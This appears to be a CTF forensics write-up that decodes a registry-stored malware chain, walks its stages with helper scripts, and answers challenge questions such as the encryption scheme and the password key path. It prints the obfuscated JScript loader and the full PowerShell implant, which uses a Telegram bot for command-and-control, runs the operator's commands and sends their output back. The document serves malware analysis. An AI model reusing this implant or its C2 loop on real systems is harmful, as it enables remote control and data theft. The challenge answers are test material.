rAfSKHGazGdiSO0E";YNDfeZ7nhCFgDsnyuf6T="bq2xDTgFixeZHlssFrQLJ0KFbFQ6YwSMWI6pP6nFCKzg";thqEpeLEVHKEdDqA6gJPO="yvkbsKcYP2MQ9BmjY6ovcSQu7BPxFMOLofM1rLOH5eWS3fq";hdsbBW6vslEvfTgMZWAHw="usx65VNEaY6RscalJfMNqzf2ta51fK0S8Z";AOJxskajyajHlX8rrJwVjj="cH96okEBlOVbxbG9hynsBO";IzyFobDle1EfTbt0UaYR="NHH9vegXsxSIPYCixW9r2oAdqNUv";jiK=new ActiveXObject("WScript.Shell");hhfHSU7sHS="lIAsjZQE0o";lIAsjZQE0o=jiK.RegRead("HKCU\\software\\Classes\\AppXoiy6rzzu62tdihr9rgvofad4hz7tpf4m\\Shell\\open\\onYj");KDprMaI6LqDP="";for(dmcVPZEPsN0pkc=tVmtxai7BNjr8pYvV=0;tVmtxai7BNjr8pYvV<GL1F5ur.length;tVmtxai7BNjr8pYvV++){KDprMaI6LqDP+=String.fromCharCode(GL1F5ur.substr(tVmtxai7BNjr8pYvV,1).charCodeAt()^lIAsjZQE0o.substr(dmcVPZEPsN0pkc,1).charCodeAt());dmcVPZEPsN0pkc=(dmcVPZEPsN0pkc<lIAsjZQE0o.length-1)?dmcVPZEPsN0pkc+1:0;}VMCDaITzJEuxUzFfqW6CxmIv="RmzkSvCuNtQSvirqhosFwNevflt";g5CaYPcfMLBQAI4YxnKM="Ly4CoYRzm1dqgsT8Nith7ObPUA";RIAF5BwTKhPpCYMZmlOSH="9PXgGoNIsZgAAtv9KPbPl9qsEaUIq8eAKD0";ZllGThtipbS6AcFiANdtp9zPY="nuRBVGbAcB6OdhZEnSFGDHhg2TC8ZPACb7wc94fpDm0QN";oE4JKDACuNkqdZxpDsNfzDL="OR0QfvvwO9U33UCusmZStnP98k4rZ";eval(KDprMaI6LqDP);UheieKveLxiExaFZ2u7yrR="OMesq8pJZjHUSlFjUQXUEcygMg9aYzpmy0";amYEf1UDURGnOld8XVmet="g8v0M2CoTITjcUeZijB0ULjDHMEmPxb";rJlMSwPfGIHOqoqse5SYF="ki01xcJlzvVvKaZB5DmilXTLkdhQTt";cRkDgAkkUElXsDMMNfwvB3="CbO8GOb9qJiK3txOD4I31x553g";fKofUDgNWdzm6nK5sAD="k2wtzKHWBB9o5DJjDYUJkgwCaV2Yr";MPgXgpbcfPwwn4hJJzMsmHG="b4APzFzCv6FZ8rwNR";W05PzuKnofjNtIxYgKN="yaM1OoY576346cqEBmJSKvZwuZGHuXQaK7JY2Ullt5eOrE";HhxvXLzOLLi

Excerpt:

cRkDgAkkUElXsDMMNfwvB3="CbO8GOb9qJiK3txOD4I31x553g"
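Both decoding steps reimplemented in Python, as an added example that is not part of the writeup: stage 1 (reverse, then hex-decode, as in the mshta script above) and stage 2 (hex-decode Hx86J, then repeating-key XOR against the value read from ...\Shell\open\onYj, whose real content the writeup does not show), plus a small extractor for the string literal assigned to a given variable name. The encode_* helpers are the inverses, included only to build test input; the key and scripts used below are constructed.

```python
import re


def decode_stage1(display_name: str) -> str:
    """Stage 1: HKCU\\Software\\Classes\\Directory\\DisplayName holds the next script
    hex-encoded and then reversed.  Reverse it back and turn each hex pair into a
    character.  String.fromCharCode(0..255) maps 1:1 onto Latin-1, hence that codec."""
    hex_text = display_name[::-1]
    return bytes.fromhex(hex_text).decode("latin-1")


def encode_stage1(script: str) -> str:
    """Inverse of decode_stage1 (constructed helper for building test input)."""
    return script.encode("latin-1").hex()[::-1]


def decode_stage2(hx86j_hex: str, key: str) -> str:
    """Stage 2: Hx86J is plain hex; the decoded string is XORed character by character
    with the registry value onYj, the key index wrapping to 0 at the end of the key.
    The key is assumed to be ASCII, as the JScript XORs UTF-16 code units."""
    data = bytes.fromhex(hx86j_hex).decode("latin-1")
    return "".join(chr(ord(c) ^ ord(key[i % len(key)])) for i, c in enumerate(data))


def encode_stage2(script: str, key: str) -> str:
    """Inverse of decode_stage2 (constructed helper; ASCII input only)."""
    xored = "".join(chr(ord(c) ^ ord(key[i % len(key)])) for i, c in enumerate(script))
    return xored.encode("latin-1").hex()


def variable_value(script: str, name: str):
    """String literal assigned to a JScript variable, e.g. the
    cRkDgAkkUElXsDMMNfwvB3 value asked for in question 4; None if absent."""
    m = re.search(r"\b" + re.escape(name) + r'\s*=\s*"([^"]*)"', script)
    return m.group(1) if m else None


if __name__ == "__main__":
    # Constructed round trip: a fake stage-2 script and a fake onYj key.
    stage2 = 'a="1";cRkDgAkkUElXsDMMNfwvB3="CbO8GOb9qJiK3txOD4I31x553g";eval("x");'
    stored = encode_stage1(stage2)
    print(decode_stage1(stored) == stage2)
    blob = encode_stage2(stage2, "fakekey")
    print(variable_value(decode_stage2(blob, "fakekey"), "cRkDgAkkUElXsDMMNfwvB3"))
```

On a live image the two inputs come straight from the hives: DisplayName from NTUSER.DAT under Software\Classes\Directory, and onYj from UsrClass.dat under the AppX ProgID's Shell\open key, so the whole chain can be decoded offline without ever running mshta.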

Question 5:

[5/10] What algorithm/encryption scheme is used in the final payload? (ie: RC4)
> AES
[+] Correct!

Eval (the PowerShell payload that the XOR stage hands to eval):

[System.Net.ServicePointManager]::SecurityProtocol=@(("{1}{0}" -f'12','Tls'),("{1}{0}"-f 's11','Tl'),"Tls",("{0}{1}" -f'Ssl','3'));
$a1=gp ((("{1}{3}{0}{4}{2}{5}" -f 'ntk','HKCU','ro',':','ntkEnvi','nment')).rEpLaCe(([cHar]110+[cHar]116+[cHar]107),'\'));
$j2=$a1.Update;
$F2=$a1.guid;
$y3=$a1.tid;
$j5=$a1.hid;
$g1=$a1.bid;
function h1($j0){$v4=[System.Security.Cryptography.HashAlgorithm]::Create('md5');
$x3=$v4.ComputeHash([System.Text.Encoding]::UTF8.GetBytes($j0));
$n6=[System.BitConverter]::ToString($x3);
return $n6.Replace('-','')};
function s9($n1,$x8){$k7=gi $n1;
foreach($b5 in $k7.Property){$u6=$k7.Name+";"+$b5;
$x3=h1 $u6;
if($x8 -eq $x3){return ((gp $n1 -Name $b5).$b5)}}foreach($n2 in $k7.GetSubkeyNames()){$v8=s9 ($n1+"\"+$n2) $x8;
if($v8.Length -gt 0){return $v8}}return ""};
function n9{param([byte[]]$n3)$c4=New-Object System.IO.MemoryStream($n3,0,$n3.Length);
$c5=New-Object Byte[](32);
$x2=$c4.Read($c5,0,$c5.Length);
if($x2 -ne $c5.Length){exit}$b5=New-Object System.Security.Cryptography.Rfc2898DeriveBytes($m0,$c5);
$b7=$b5.GetBytes(32);
$v9=$b5.GetBytes(16);
$h5=New-Object Security.Cryptography.AesManaged;
$e3=$h5.CreateDecryptor($b7,$v9);
$w5=New-Object IO.MemoryStream;
$q7=New-Object System.Security.Cryptography.CryptoStream($c4,$e3,[System.Security.Cryptography.CryptoStreamMode]::Read);
$q7.CopyTo($w5);
$w5.Position=0;
$y5=New-Object IO.StreamReader($w5);
$u9=$y5.ReadToEnd();
$y5.Dispose();
$q7.Dispose();
$w5.Dispose();
$c4.Dispose();
return $u9};
$m0=s9 ((("{2}{0}{8}{5}{3}{1}{9}{6}{4}{7}"-f 'C','qIoclassesqIo','HK','e','rfac','r','e','e','U:qIosoftwa','Int')).REPlacE(([CHaR]113+[CHaR]73+[CHaR]111),[String][CHaR]92)) ("{0}{3}{5}{1}{2}{7}{4}{6}{8}" -f'6ca2','f6f6','465afb8','4d7c','cd1b','7','0c','2da','71f');
$g11=n9 $g1;
$j51=n9 $j5;
$y31=n9 $y3;
$i0="$g11`:$y31";
$g2=irm ("{0}{2}{4}{3}{1}{5}"-f'https://ifcon','/i','fi','me','g.','p');
if(-not (New-Object System.Threading.Mutex($false,$F2)).WaitOne(1)){
    exit
};
if($j2 -and $F2){
    irm -Uri "https://api.telegram.org/bot$($i0)/sendMessage?chat_id=$($j51)&text=$F2 ;; $env:COMPUTERNAME reconnected! "
} else {
    $F2=[guid]::NewGuid().guid;
    Set-ItemProperty ((("{1}{3}{4}{0}{2}"-f'o','HKCU','nment',':GFaGFaEn','vir')).REplAce('GFa',[StriNG][cHAr]92)) -name ("{0}{1}"-f'G','UID') -value $F2;
    irm -Uri "https://api.telegram.org/bot$($i0)/sendMessage?chat_id=$($j51)&text=$F2 ;; $env:COMPUTERNAME new connection! "
};
if($j2 -isnot [int]){
    $j2=0
};
while(1){
    (irm -Uri "https://api.telegram.org/bot$($i0)/getUpdates").result|%{if($j2 -lt $_.update_id){$j2=$_.update_id;
    $u6,$r4=$_.message.text -split ";;";
    if(($u6 -like $g2) -or ($u6 -like $env:COMPUTERNAME) -or ($u6 -like $F2) -or ($u6 -like "all")){$r0=$($r4|iex)2>&1|Out-String;
    if("" -eq $r0){$r0=("{1}{0}{2}" -f 'n','Task Do','e!!')}$u8=0;
    while($u8 -lt $r0.Length){$r1=3999;
    if(($r1+$u8)-gt $r0.Length){$r1=$r0.Length%3999}
    irm -Uri "https://api.telegram.org/bot$($i0)/sendMessage?chat_id=$($j51)&text=$F2 : $($_.message.message_id)`n$($r0.Substring($u8,$r1)) ";
    $u8+=$r1}}}
    Set-ItemProperty ((("{0}{3}{1}{2}{4}" -f'HKCU:vQF','FEnvir','onme','vQ','nt')).rePLACe('vQF',[STRinG][ChAr]92)) -name ("{0}{1}"-f 'U','pdate') -value $j2}
}
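The tasking protocol in the loop above, rebuilt in Python as an added example (not code from the writeup) so an analyst can replay captured getUpdates responses and see which messages this host would have executed. A message is "target;;command"; the implant runs the command only when target equals its public IP (from ifconfig.me), $env:COMPUTERNAME, its GUID, or "all" (-like with no wildcard in the pattern is a case-insensitive equality test), and it replies in 3999-character pieces, substituting "Task Done!!" for empty output. The getUpdates JSON below is constructed.

```python
import json

CHUNK = 3999                 # the implant splits output into 3999-character messages
IDLE_REPLY = "Task Done!!"   # sent when the command produced no output


def select_tasks(get_updates_json: str, identities, last_update_id: int):
    """Mirror of the polling loop.  `identities` are the strings the implant answers to
    (public IP, COMPUTERNAME, stored GUID); "all" is always accepted.  Updates at or
    below `last_update_id` (persisted in HKCU\\Environment\\Update) are skipped.
    Returns the new high-water mark and [(update_id, message_id, target, command)]."""
    accepted = {i.lower() for i in identities} | {"all"}
    tasks = []
    for upd in json.loads(get_updates_json)["result"]:
        if upd["update_id"] <= last_update_id:
            continue
        last_update_id = upd["update_id"]
        text = upd.get("message", {}).get("text", "")
        target, _, command = text.partition(";;")   # no ";;" -> empty command
        if target.lower() in accepted:
            tasks.append((upd["update_id"], upd["message"]["message_id"], target, command))
    return last_update_id, tasks


def format_replies(guid: str, message_id: int, output: str):
    """Mirror of the reply loop: empty output becomes IDLE_REPLY; long output is cut
    into CHUNK-sized pieces, each prefixed with "<guid> : <message_id>" and a newline."""
    if output == "":
        output = IDLE_REPLY
    pieces, pos = [], 0
    while pos < len(output):
        size = CHUNK
        if size + pos > len(output):
            size = len(output) % CHUNK   # same arithmetic as the script's final chunk
        pieces.append(f"{guid} : {message_id}\n{output[pos:pos + size]}")
        pos += size
    return pieces


# Constructed getUpdates response: three operator messages, only the last aimed at us.
SAMPLE_GET_UPDATES = json.dumps({"ok": True, "result": [
    {"update_id": 100, "message": {"message_id": 7, "text": "all;;whoami"}},
    {"update_id": 101, "message": {"message_id": 8, "text": "OTHER-PC;;dir C:\\"}},
    {"update_id": 102, "message": {"message_id": 9, "text": "ws-victim;;Get-Process"}},
]})


if __name__ == "__main__":
    hwm, tasks = select_tasks(SAMPLE_GET_UPDATES, ["203.0.113.5", "WS-VICTIM"], 100)
    print(hwm, tasks)
    print(format_replies("GUID", 9, "")[0])
```

Because every bot shares one Telegram chat, tasking is visible to every implant that polls; the target prefix is the only thing that keeps a command from running everywhere, and "all" removes even that.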

Excerpt:

$h5=New-Object Security.Cryptography.AesManaged;
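The n9 routine rebuilt in Python as an added example (not code from the writeup), so the three REG_BINARY blobs the script reads from HKCU\Environment (bid, tid, hid) can be decrypted offline once the password has been recovered. The blob layout is 32-byte salt followed by AES-CBC/PKCS7 ciphertext; key and IV are the first 32 and next 16 bytes of one PBKDF2-HMAC-SHA1 stream with 1000 iterations, which is what Rfc2898DeriveBytes(password, salt) followed by GetBytes(32) and GetBytes(16) produces, and what the assertions below verify against the RFC 6070 vector. PBKDF2 needs only the standard library; the AES step assumes the third-party cryptography package is installed (pip install cryptography). The encrypt_payload helper is the inverse, included only to build test blobs; the passwords and plaintexts below are constructed.

```python
import hashlib

try:
    from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
    from cryptography.hazmat.primitives import padding
except ImportError:          # key derivation still works without the package
    Cipher = None

SALT_LEN = 32                # n9 reads the first 32 bytes of the blob as the salt
KEY_LEN, IV_LEN = 32, 16     # GetBytes(32) then GetBytes(16)
ITERATIONS = 1000            # Rfc2898DeriveBytes default: 1000 rounds of HMAC-SHA1


def aes_available() -> bool:
    return Cipher is not None


def derive_key_iv(password: str, salt: bytes, iterations: int = ITERATIONS):
    """Consecutive GetBytes() calls read one PBKDF2 output stream, so key and IV are
    one 48-byte derivation split in two, not two independent derivations."""
    stream = hashlib.pbkdf2_hmac("sha1", password.encode("utf-8"), salt,
                                 iterations, KEY_LEN + IV_LEN)
    return stream[:KEY_LEN], stream[KEY_LEN:]


def split_blob(blob: bytes):
    """salt || ciphertext; the script silently exits on a blob shorter than the salt."""
    if len(blob) < SALT_LEN:
        raise ValueError("blob shorter than the 32-byte salt")
    return blob[:SALT_LEN], blob[SALT_LEN:]


def decrypt_payload(blob: bytes, password: str) -> str:
    """Mirror of n9: AES-256-CBC with PKCS7 padding (AesManaged defaults), UTF-8 text."""
    if Cipher is None:
        raise RuntimeError("install the cryptography package for the AES step")
    salt, ciphertext = split_blob(blob)
    key, iv = derive_key_iv(password, salt)
    dec = Cipher(algorithms.AES(key), modes.CBC(iv)).decryptor()
    padded = dec.update(ciphertext) + dec.finalize()
    unpad = padding.PKCS7(128).unpadder()
    return (unpad.update(padded) + unpad.finalize()).decode("utf-8")


def encrypt_payload(plaintext: str, password: str, salt: bytes = b"\x01" * SALT_LEN) -> bytes:
    """Inverse of n9 (constructed helper used only to build test blobs)."""
    if Cipher is None:
        raise RuntimeError("install the cryptography package for the AES step")
    key, iv = derive_key_iv(password, salt)
    pad = padding.PKCS7(128).padder()
    padded = pad.update(plaintext.encode("utf-8")) + pad.finalize()
    enc = Cipher(algorithms.AES(key), modes.CBC(iv)).encryptor()
    return salt + enc.update(padded) + enc.finalize()


if __name__ == "__main__":
    # Constructed values; the real password is the registry value s9 locates.
    blob = encrypt_payload("123456789:FAKE-BOT-TOKEN", "constructed-password")
    print(decrypt_payload(blob, "constructed-password"))
```

Once decrypted, the script concatenates bid and tid as "bid:tid" to form the Telegram bot token and uses hid as the chat_id, so these three values are the ones to pull for the later questions about the C2 channel.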

Question 6:

[6/10] What is the full path of the key containing the password to derive the encryption key? (ie: HKEY_LOCAL_MACHINE\SAM\SAM\LastSkuUpgrade)

> HKEY_CURRENT_USER\software\classes\Interface\{a7126d4c-f492-4eb9-8a2a-f673dbdd3334}\TypeLib
[+] Correct!

The PowerShell script walks HKCU:\software\classes\Interface looking for the key/value name whose MD5 hash is 6ca24d7c7f6f6465afb82dacd1b0c71f, so the registry path itself never appears in the script in clear text. With the obfuscated format strings resolved, the call (s9 is the lookup function) reads:

$m0 = s9 "HKCU:\software\classes\Interface" "6ca24d7c7f6f6465afb82dacd1b0c71f"
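To reproduce that lookup yourself on a live system or a mounted hive, here is an added example (my own script, not the challenge author's and not part of the malware): it walks the subtree, hashes the string "<full key name>;<value name>" for every value under it and reports the one matching the target. The hashed-string format is an assumption inferred from the layout of the output lines in this writeup; Get-Fingerprint is a helper name I chose. Running it against the target hash above should single out the key the script reads its password from.

```powershell
# Added example, not the challenge's own code: find the registry value whose
# "<key name>;<value name>" string hashes to a given MD5.
# Assumption: the sample hashes the UTF-8 text "<full key name>;<value name>",
# which is the layout of the writeup's dump; change Get-Fingerprint if not.
param(
    [string]$Root   = 'HKCU:\software\classes\Interface',
    [string]$Target = '6ca24d7c7f6f6465afb82dacd1b0c71f'
)

$md5 = [System.Security.Cryptography.MD5]::Create()

# Hex MD5 of a string (helper name is my own choice).
function Get-Fingerprint {
    param([string]$Text)
    $bytes = [System.Text.Encoding]::UTF8.GetBytes($Text)
    ($md5.ComputeHash($bytes) | ForEach-Object { $_.ToString('x2') }) -join ''
}

# Include the root key itself so its own values are checked as well as every subkey.
$keys = @(Get-Item -Path $Root) +
        @(Get-ChildItem -Path $Root -Recurse -ErrorAction SilentlyContinue)

foreach ($key in $keys) {
    # $key.Property lists the value names; the unnamed default value is shown as "(default)".
    foreach ($valueName in $key.Property) {
        $candidate = "$($key.Name);$valueName"
        $hash = Get-Fingerprint $candidate
        if ($hash -eq $Target) {
            # GetValue needs the empty string, not "(default)", to read the default value.
            $dataName = if ($valueName -eq '(default)') { '' } else { $valueName }
            [PSCustomObject]@{
                Key   = $key.Name
                Value = $valueName
                Data  = $key.GetValue($dataName)
                MD5   = $hash
            }
        }
    }
}

$md5.Dispose()
```

Save it as a .ps1 and run it on the affected profile (or with the hive loaded under HKU and $Root pointed there); a single object naming the key, the value name and its data is the answer to this question, and the same loop with a different $Target locates the other hash-referenced values the script reads (the Telegram token and chat id).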

forensics_counterdefensive_9

Figuring out syntax:

(gi HKCU:\software\classes\Interface).Name
HKEY_CURRENT_USER\software\classes\Interface

(gi "HKCU:\software\classes\Interface\{FF037274-455A-4E34-B5D1-D42DB866F9B7}\TypeLib").Property
(default)
Version
HKEY_CURRENT_USER\software\classes\Interface;{0299ECA9-80B6-43C8-A79A-FB1C5F19E7D8}=dbdcdebfef09d32560a761c870641919
HKEY_CURRENT_USER\software\classes\Interface;{02C98E2C-6C9F-49F8-9B57-3A6E1AA09A67}=a206d5f0f1b8819302cdc8a1d0dd0495
HKEY_CURRENT_USER\software\classes\Interface;{0d4e4444-cb20-4c2b-b8b2-94e5656ecae8}=eefe63048a4dce89782a630339ab8448
HKEY_CURRENT_USER\software\classes\Interface;{0f872661-c863-47a4-863f-c065c182858a}=4114a3eedac52f6f89d83950eb359b69
HKEY_CURRENT_USER\software\classes\Interface;{10C9242E-D604-49B5-99E4-BF87945EF86C}=421a3ff784cbaea3df7fed469617b336
HKEY_CURRENT_USER\software\classes\Interface;{1196AE48-D92B-4BC7-85DE-664EC3F761F1}=705daa44404301d7ed89eeea7507e1ca
HKEY_CURRENT_USER\software\classes\Interface;{13987a48-a837-465d-b6be-8302db0e4ce6}=0566df6e54682bdecd4e7ea24daf419a
HKEY_CURRENT_USER\software\classes\Interface;{1B71F23B-E61F-45C9-83BA-235D55F50CF9}=8d6e9099e533eca9653cddac858e73aa
HKEY_CURRENT_USER\software\classes\Interface;{1b7aed4f-fcaf-4da4-8795-c03e635d8edc}=a97dae37db5a8acb6f9c39583ae7bb1b
HKEY_CURRENT_USER\software\classes\Interface;{1EDD003E-C446-43C5-8BA0-3778CC4792CC}=93def1beae01b22482946b83bf1cfa04
HKEY_CURRENT_USER\software\classes\Interface;{22A68885-0FD9-42F6-9DED-4FB174DC7344}=de658431840c7107098b779258655eab
HKEY_CURRENT_USER\software\classes\Interface;{2692D1F2-2C7C-4AE0-8E73-8F37736C912D}=2bc0cc55ec1cf4c7b2804c464ba31a1e
HKEY_CURRENT_USER\software\classes\Interface;{2B865677-AC3A-43BD-B9E7-BF6FCD3F0596}=32f4fa37ecc4f9bbc64f7ea9cea0ecac
HKEY_CURRENT_USER\software\classes\Interface;{2EB31403-EBE0-41EA-AE91-A1953104EA55}=069791f003eefb731118ff64ff9548d6
HKEY_CURRENT_USER\software\classes\Interface;{2F12C599-7AA5-407A-B898-09E6E4ED2D1E}=3f3c8cf9a8dbec56913a83c805224bed
HKEY_CURRENT_USER\software\classes\Interface;{31508CC7-9BC7-494B-9D0F-7B1C7F144182}=8b7ae3173beff80750ab15527c8f51c7
HKEY_CURRENT_USER\software\classes\Interface;{385ED83D-B50C-4580-B2C3-9E64DBE7F511}=640d19747fb8462486954f25a1b8c72d
HKEY_CURRENT_USER\software\classes\Interface;{390AF5A7-1390-4255-9BC9-935BFCFA5D57}=c6696fdda4ab7197a419ef0fd54d7f8d
HKEY_CURRENT_USER\software\classes\Interface;{3A4E62AE-45D9-41D5-85F5-A45B77AB44E5}=a0bd51a4665e4d576c16f5c1e003fb08
HKEY_CURRENT_USER\software\classes\Interface;{4410DC33-BC7C-496B-AA84-4AEA3EEE75F7}=df9c7f13b96da7ec14fd9e78a1ebfce5
HKEY_CURRENT_USER\software\classes\Interface;{466F31F7-9892-477E-B189-FA5C59DE3603}=95c00b58ad41c928225a32849a64b85d
HKEY_CURRENT_USER\software\classes\Interface;{50487D09-FFA9-45E1-8DF5-D457F646CD83}=c9de6a3f9a6f1db1e28cea4d9f8c7708
HKEY_CURRENT_USER\software\classes\Interface;{54034913-37F9-4E26-8646-3D2EF536C786}=e37e64e89dc6305767452ee114a43330
HKEY_CURRENT_USER\software\classes\Interface;{5D5DD08F-A10E-4FEF-BCA7-E73E666FC66C}=fb0bf883d6971e96c3e941146bc9ab8d
HKEY_CURRENT_USER\software\classes\Interface;{679EC955-75AA-4FB2-A7ED-8C0152ECF409}=d936e814dd4de12a53e066ff8a7c6dab
HKEY_CURRENT_USER\software\classes\Interface;{6A821279-AB49-48F8-9A27-F6C59B4FF024}=395d27651fc3fe4338f67e9b73fc77d7
HKEY_CURRENT_USER\software\classes\Interface;{79A2A54C-3916-41FD-9FAB-F26ED0BBA755}=7b0496942a43a7e7926b14d102bae5d4
HKEY_CURRENT_USER\software\classes\Interface;=aeb379f9915014fc753632029dd21433
HKEY_CURRENT_USER\software\classes\Interface\{0299ECA9-80B6-43C8-A79A-FB1C5F19E7D8};(default)=72c033cf9b416211b2f3f4644da89ba0
HKEY_CURRENT_USER\software\classes\Interface\{02C98E2C-6C9F-49F8-9B57-3A6E1AA09A67};(default)=669e2b37a452094017d1721dae8909be
HKEY_CURRENT_USER\software\classes\Interface\{0d4e4444-cb20-4c2b-b8b2-94e5656ecae8};(default)=6aa7908267bb922ab0d35ed1564a67ed
HKEY_CURRENT_USER\software\classes\Interface\{0f872661-c863-47a4-863f-c065c182858a};(default)=ec97d546f1294d6eab9b16531bb735f4
HKEY_CURRENT_USER\software\classes\Interface\{10C9242E-D604-49B5-99E4-BF87945EF86C};(default)=f35acaf0a318b88b9743dcb75fa4885c
HKEY_CURRENT_USER\software\classes\Interface\{1196AE48-D92B-4BC7-85DE-664EC3F761F1};(default)=8ca6145962b72baa2f886edb6a81425b
HKEY_CURRENT_USER\software\classes\Interface\{13987a48-a837-465d-b6be-8302db0e4ce6};(default)=d3f1157220c2059ee02866c7e24b3d19
HKEY_CURRENT_USER\software\classes\Interface\{1B71F23B-E61F-45C9-83BA-235D55F50CF9};(default)=2f61cffcacfd2192b2c8c9e921c12d57
HKEY_CURRENT_USER\software\classes\Interface\{1b7aed4f-fcaf-4da4-8795-c03e635d8edc};(default)=dd5788aa736131506d91d76cd542feb9
HKEY_CURRENT_USER\software\classes\Interface\{1EDD003E-C446-43C5-8BA0-3778CC4792CC};(default)=e257f22ee06bf58293a1d941105d5fdd
HKEY_CURRENT_USER\software\classes\Interface\{22A68885-0FD9-42F6-9DED-4FB174DC7344};(default)=939740483d4cde4a0b1ef73fb1808472
HKEY_CURRENT_USER\software\classes\Interface\{2692D1F2-2C7C-4AE0-8E73-8F37736C912D};(default)=018d94947ae802013b4d5825ad6f57cd
HKEY_CURRENT_USER\software\classes\Interface\{2B865677-AC3A-43BD-B9E7-BF6FCD3F0596};(default)=d48e14038755a8140ff4575fb49825e2
HKEY_CURRENT_USER\software\classes\Interface\{2EB31403-EBE0-41EA-AE91-A1953104EA55};(default)=e4a36e6648cd9bf94409b6d24dc74c0e
HKEY_CURRENT_USER\software\classes\Interface\{2F12C599-7AA5-407A-B898-09E6E4ED2D1E};(default)=c3e3c2cb641e3894e99188e43ebdb7ed
HKEY_CURRENT_USER\software\classes\Interface\{31508CC7-9BC7-494B-9D0F-7B1C7F144182};(default)=861cdc74c807c7e1d808ad8f52ab7773
HKEY_CURRENT_USER\software\classes\Interface\{385ED83D-B50C-4580-B2C3-9E64DBE7F511};(default)=22e9c663da4dbdd48be6bede3403479a
HKEY_CURRENT_USER\software\classes\Interface\{390AF5A7-1390-4255-9BC9-935BFCFA5D57};(default)=f3498713a65f121d26eb73b5c24bb115
HKEY_CURRENT_USER\software\classes\Interface\{3A4E62AE-45D9-41D5-85F5-A45B77AB44E5};(default)=cf948dc2adb1e79411c3b324995191a3
HKEY_CURRENT_USER\software\classes\Interface\{4410DC33-BC7C-496B-AA84-4AEA3EEE75F7};(default)=999138b84802eabacfb00a7a0371d267
HKEY_CURRENT_USER\software\classes\Interface\{466F31F7-9892-477E-B189-FA5C59DE3603};(default)=86a45237216ebb4807cad220e67f93e3
HKEY_CURRENT_USER\software\classes\Interface\{50487D09-FFA9-45E1-8DF5-D457F646CD83};(default)=49d8a00bf3b2f68d90bdd9c699219e9e
HKEY_CURRENT_USER\software\classes\Interface\{54034913-37F9-4E26-8646-3D2EF536C786};(default)=2a13e6ea20bf2d378d8bd34ed72c4e93
HKEY_CURRENT_USER\software\classes\Interface\{5D5DD08F-A10E-4FEF-BCA7-E73E666FC66C};(default)=fec484ca120ef06768ad8bd2f373cb2e
HKEY_CURRENT_USER\software\classes\Interface\{679EC955-75AA-4FB2-A7ED-8C0152ECF409};(default)=e2095a9bf048f976f5a6cf1f960eb05a
HKEY_CURRENT_USER\software\classes\Interface\{6A821279-AB49-48F8-9A27-F6C59B4FF024};(default)=9453265044c0410c2b64d566e881be5d
HKEY_CURRENT_USER\software\classes\Interface\{79A2A54C-3916-41FD-9FAB-F26ED0BBA755};(default)=4956980a0919dbd41ce865569315c652
HKEY_CURRENT_USER\software\classes\Interface\{869BDA08-7ACF-42B8-91AE-4D8D597C0B33};(default)=7b04d590e49688a93b3c77890f6cc5bf
HKEY_CURRENT_USER\software\classes\Interface\{886DFE8E-D1BB-4062-B7C6-57DA328A37F8};(default)=0b11d2c8f5b77e71e4c25b87c3f9a55b
HKEY_CURRENT_USER\software\classes\Interface\{8B9F14F4-9559-4A3F-B7D0-312E992B6D98};(default)=db712ec652027da5100fe862a324397b
HKEY_CURRENT_USER\software\classes\Interface\{8D3F8F15-1DE1-4662-BF93-762EABE988B2};(default)=c852a272f66cfc35c501ecc61aa86c76
HKEY_CURRENT_USER\software\classes\Interface\{944903E8-B03F-43A0-8341-872200D2DA9C};(default)=d9cdc0ef331577fe07a3a853c12c052c
HKEY_CURRENT_USER\software\classes\Interface\{9D613F8A-B30E-4938-8490-CB5677701EBF};(default)=bdbad8a8a20ad84c66d414cff7f4e96a
HKEY_CURRENT_USER\software\classes\Interface\{9E1CD0DF-72E7-4284-9598-342C0A46F96B};(default)=26a463448ade7d8c823720c3c6603904
HKEY_CURRENT_USER\software\classes\Interface\{a7126d4c-f492-4eb9-8a2a-f673dbdd3334};(default)=b5471dc26ffa5e95c78552a5948d9652
HKEY_CURRENT_USER\software\classes\Interface\{A87958FF-B414-7748-9183-DBF183A25905};(default)=fdb67d359934f390ad6a650e772ecffa
HKEY_CURRENT_USER\software\classes\Interface\{A91EFACB-8B83-4B84-B797-1C8CF3AB3DCB};(default)=8c143fdfc7d785d43369377314d566fe
HKEY_CURRENT_USER\software\classes\Interface\{AB0CD980-906C-4FBB-9A5D-9E32A3C0CB37};(default)=aa8e0e3b7a1ab7e5fd0399be9fec9098
HKEY_CURRENT_USER\software\classes\Interface\{ACDB5DB0-C9D5-461C-BAAA-5DCE0B980E40};(default)=9c68ac84e9c38463175d7810c617b5c1
HKEY_CURRENT_USER\software\classes\Interface\{AEEBAD4E-3E0A-415B-9B94-19C499CD7B6A};(default)=fb36d1a786c0397064e5960f3fb25494
HKEY_CURRENT_USER\software\classes\Interface\{AF60000F-661D-472A-9588-F062F6DB7A0E};(default)=df85daca2719469946a42d59aeeaa43a
HKEY_CURRENT_USER\software\classes\Interface\{B05D37A9-03A2-45CF-8850-F660DF0CBF07};(default)=0a966706a1c9a177f15915193f2c436a
HKEY_CURRENT_USER\software\classes\Interface\{B54E7079-90C9-4C62-A6B8-B2834C33A04A};(default)=545b38e4373a23580462199c19a338b0
HKEY_CURRENT_USER\software\classes\Interface\{b5c25645-7426-433f-8a5f-42b7ff27a7b2};(default)=335c362063ac6ebff0bf256642bddf09
HKEY_CURRENT_USER\software\classes\Interface\{B5CDC0E5-9558-4899-A58B-5D894F493C1D};(default)=e21fd918f7e8146ecf83a065856ff0f3
HKEY_CURRENT_USER\software\classes\Interface\{B5E5EE2E-E012-4FC8-BCE0-C956AF66C4F3};(default)=46fed0211ff14a4183775b66899737f4
HKEY_CURRENT_USER\software\classes\Interface\{c1439245-96b4-47fc-b391-679386c5d40f};(default)=f46464ffef610c453c5b8d37ff34a767
HKEY_CURRENT_USER\software\classes\Interface\{C2FE84F5-E036-4A07-950C-9BFD3EAB983A};(default)=5e91e945109283967465ffbe3054503b
HKEY_CURRENT_USER\software\classes\Interface\{C47B67D4-BA96-44BC-AB9E-1CAC8EEA9E93};(default)=8a30fa739c3211cea5db1832c2ee094c
HKEY_CURRENT_USER\software\classes\Interface\{D0ED5C72-6197-4AAD-9B16-53FE461DD85C};(default)=35bd688074bd819994285890d115af24
HKEY_CURRENT_USER\software\classes\Interface\{D32F7B3A-DEC8-4F44-AF28-E9B7FEB62118};(default)=6cd63240ed58eedf5be20c65403884b9
HKEY_CURRENT_USER\software\classes\Interface\{d8c80ebb-099c-4208-afa3-fbc4d11f8a3c};(default)=8ec559a3edead64c5e301a4c43d456a9
